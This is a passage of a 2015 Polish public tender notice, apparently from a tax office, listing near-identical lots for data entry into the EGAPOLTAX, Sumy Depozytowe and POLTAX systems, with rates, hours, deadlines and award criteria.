Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomośc programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
